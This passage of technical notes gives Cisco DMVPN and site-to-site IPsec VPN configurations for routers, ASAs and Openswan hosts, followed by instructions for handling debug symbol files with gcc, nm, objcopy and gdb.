ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 192.168.1.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# ip address 1.2.3.1 255.255.255.0
ROUTER-1(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-1(config-if)# ip nhrp map multicast dynamic
ROUTER-1(config-if)# ip nhrp network-id 123
ROUTER-1(config-if)# tunnel source FastEthernet0/0
ROUTER-1(config-if)# tunnel mode gre multipoint
ROUTER-1(config-if)# tunnel key 123

IPsec

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.2.2
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.3.3
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-2 configuration

Network

ROUTER-2(config)# interface FastEthernet0/0
ROUTER-2(config-if)# ip address 192.168.2.2 255.255.255.0
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 192.168.2.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# ip address 1.2.3.2 255.255.255.0
ROUTER-2(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-2(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-2(config-if)# ip nhrp network-id 123
ROUTER-2(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-2(config-if)# tunnel source FastEthernet0/0
ROUTER-2(config-if)# tunnel mode gre multipoint
ROUTER-2(config-if)# tunnel key 123

IPsec

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-3 configuration

Network

ROUTER-3(config)# interface FastEthernet0/0
ROUTER-3(config-if)# ip address 192.168.3.3 255.255.255.0
ROUTER-3(config)# ip route 0.0.0.0 0.0.0.0 192.168.3.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# ip address 1.2.3.3 255.255.255.0
ROUTER-3(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-3(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-3(config-if)# ip nhrp network-id 123
ROUTER-3(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-3(config-if)# tunnel source FastEthernet0/0
ROUTER-3(config-if)# tunnel mode gre multipoint
ROUTER-3(config-if)# tunnel key 123

IPsec

ROUTER-3(config)# crypto isakmp policy 1
ROUTER-3(config-isakmp)# authentication pre-share
ROUTER-3(config-isakmp)# encryption aes
ROUTER-3(config-isakmp)# hash sha
ROUTER-3(config-isakmp)# group 2
ROUTER-3(config-isakmp)# lifetime 86400
ROUTER-3(config)# crypto isakmp aggressive-mode disable
ROUTER-3(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-3(config)# crypto isakmp enable
ROUTER-3(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-3(config)# crypto ipsec profile PROFILE
ROUTER-3(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-3(ipsec-profile)# set pfs group2
ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# tunnel protection ipsec profile PROFILE

Troubleshooting commands

Router# show ip nhrp
Router# show dmvpn
Router# show crypto isakmp sa
Router# show crypto ipsec sa

# Site-to-site IPsec VPN configurations

Topology

[PC-1]----[VPN_DEVICE-1]----[VPN_DEVICE-2]----[PC-2]

[VPN_DEVICE-1] can be a Cisco ASA (ASA-1), a Cisco router (ROUTER-1) or an Openswan host (LINUX-1).
[VPN_DEVICE-2] can be a Cisco ASA (ASA-2), a Cisco router (ROUTER-2) or an Openswan host (LINUX-2).
All three speak the same IKEv1 policy (pre-shared key, AES-128, SHA-1, DH group 2 for both phases) so that any pairing interoperates. Group 2 is 1024-bit MODP and SHA-1 is deprecated for IKE; prefer group 14 or higher and SHA-256 wherever every peer supports them.

[PC-1] eth0: 192.168.1.1/24

[VPN_DEVICE-1]
(ASA-1) e0/1, (ROUTER-1) fa0/1, (LINUX-1) eth1: 192.168.1.254/24
(ASA-1) e0/0, (ROUTER-1) fa0/0, (LINUX-1) eth0: 12.12.12.1/24

[VPN_DEVICE-2]
(ASA-2) e0/0, (ROUTER-2) fa0/0, (LINUX-2) eth0: 12.12.12.2/24
(ASA-2) e0/1, (ROUTER-2) fa0/1, (LINUX-2) eth1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Between two ASAs

ASA-1(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-1(config-ikev1-policy)# authentication pre-share
ASA-1(config-ikev1-policy)# encryption aes
ASA-1(config-ikev1-policy)# hash sha
ASA-1(config-ikev1-policy)# group 2
ASA-1(config-ikev1-policy)# lifetime 86400
ASA-1(config)# crypto ikev1 am-disable
ASA-1(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-1(config)# tunnel-group 12.12.12.2 type ipsec-l2l
ASA-1(config)# tunnel-group 12.12.12.2 ipsec-attributes
ASA-1(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-1(config)# access-list CRYPTO_ACL permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
ASA-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-1(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.2
ASA-1(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-1(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-1(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-1(config)# crypto map CRYPTO_MAP interface outside
ASA-1(config)# route outside 192.168.2.0 255.255.255.0 12.12.12.2
ASA-1(config)# object network INSIDE_NET
ASA-1(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-1(config)# object network OUTSIDE_NET
ASA-1(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-1(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET destination static OUTSIDE_NET OUTSIDE_NET
ASA-1(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL
ASA-2(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-2(config-ikev1-policy)# authentication pre-share
ASA-2(config-ikev1-policy)# encryption aes
ASA-2(config-ikev1-policy)# hash sha
ASA-2(config-ikev1-policy)# group 2
ASA-2(config-ikev1-policy)# lifetime 86400
ASA-2(config)# crypto ikev1 am-disable
ASA-2(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-2(config)# tunnel-group 12.12.12.1 type ipsec-l2l
ASA-2(config)# tunnel-group 12.12.12.1 ipsec-attributes
ASA-2(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-2(config)# access-list CRYPTO_ACL permit ip 192.168.2.0 255.255.255.0 192.168.1.0 255.255.255.0
ASA-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-2(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.1
ASA-2(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-2(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-2(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-2(config)# crypto map CRYPTO_MAP interface outside
ASA-2(config)# route outside 192.168.1.0 255.255.255.0 12.12.12.1
ASA-2(config)# object network INSIDE_NET
ASA-2(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-2(config)# object network OUTSIDE_NET
ASA-2(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-2(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET destination static OUTSIDE_NET OUTSIDE_NET
ASA-2(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL

Between two IOS routers

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Between two Openswan servers

LINUX-1# route add default gw 12.12.12.2
LINUX-1# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-1# iptables -t nat -I POSTROUTING -s 192.168.1.0/24 -d 192.168.2.0/24 -j ACCEPT
LINUX-1# iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 12.12.12.1 -o eth0
LINUX-1# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-2
 type=tunnel
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-1# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-1# service ipsec start
LINUX-2# route add default gw 12.12.12.1
LINUX-2# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-2# iptables -t nat -I POSTROUTING -s 192.168.2.0/24 -d 192.168.1.0/24 -j ACCEPT
LINUX-2# iptables -t nat -A POSTROUTING -s 192.168.2.0/24 -j SNAT --to 12.12.12.2 -o eth0
LINUX-2# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-1
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-2# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-2# service ipsec start

# Working with symbols files


What is a symbols file?

A file containing a table that maps each identifier (function, variable, type) to information about its declaration and its location (address) in the binary.


Compiling with or without debugging information for GDB

# gcc -o example_debug -ggdb example.c
# gcc -o example_nodebug example.c

Listing symbols from object file

# nm example_debug

Three columns: Virtual_address | Symbol_type | Symbol_name
Lowercase symbol types are local; uppercase types are global (external).

Copying debug symbols to an external file

# objcopy --only-keep-debug example_debug example.dbg

Stripping the debug symbols added with -ggdb (modifies the file in place)

# objcopy --strip-debug example_debug

Stripping all unneeded symbol information

# objcopy --strip-debug --strip-unneeded example_debug

Adding debug symbols to a binary

# gdb example_nodebug
(gdb) symbol-file example.dbg

or, by recording the debug file's name and CRC in a .gnu_debuglink section so that GDB finds it on its own. The link normally goes into the stripped example_debug, since example.dbg was extracted from that build; a separately compiled example_nodebug may not match its addresses:

# objcopy --add-gnu-debuglink=example.dbg example_nodebug
# gdb example_nodebug

Debugging a core file

# gdb example corefile
(gdb) symbol-file example.dbg
(gdb) bt